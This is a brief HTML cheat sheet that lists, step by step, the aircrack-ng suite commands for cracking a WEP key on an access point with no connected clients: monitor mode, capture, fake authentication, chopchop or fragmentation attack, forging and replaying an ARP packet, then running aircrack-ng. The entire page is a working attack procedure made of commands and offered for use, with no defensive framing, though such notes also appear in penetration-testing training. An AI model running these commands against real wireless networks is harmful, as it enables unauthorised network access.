<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Clientless WEP attack</title>
</head><body>Clientless WEP Cracking Attack Summary<br/>
----------------------------------------<br/>
<br/>
Place your wireless card into monitor mode on the channel number of the AP:<br/>
<br/>
airmon-ng start &lt;interface&gt; &lt;AP channel&gt;<br/>
<br/>
Start an Airodump-ng capture, filtering on the AP channel and BSSID, saving the capture:<br/>
<br/>
airodump-ng -c &lt;AP channel&gt; --bssid &lt;AP MAC&gt; -w &lt;capture&gt; &lt;interface&gt;<br/>
<br/>
Conduct a fake authentication attack against the AP:<br/>
<br/>
aireplay-ng -1 0 -e &lt;ESSID&gt; -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface&gt;<br/>
<br/>
Run attack 4, the KoreK chopchop attack (or attack 5, the fragmentation attack):<br/>
<br/>
aireplay-ng -4 -b &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface&gt;<br/>
<br/>
Craft an ARP request packet using packetforge-ng:<br/>
<br/>
packetforge-ng -0 -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; -l &lt;Source IP&gt; -k &lt;Dest IP&gt; -y<br/>
&lt;xor filename&gt; -w &lt;output filename&gt;<br/>
<br/>
Inject the packet into the network using attack 2, the interactive packet replay attack:<br/>
<br/>
aireplay-ng -2 -r &lt;packet filename&gt; &lt;interface&gt;<br/>
<br/>
Crack the WEP key using Aircrack-ng:<br/>
<br/>
aircrack-ng &lt;capture&gt;</body></html>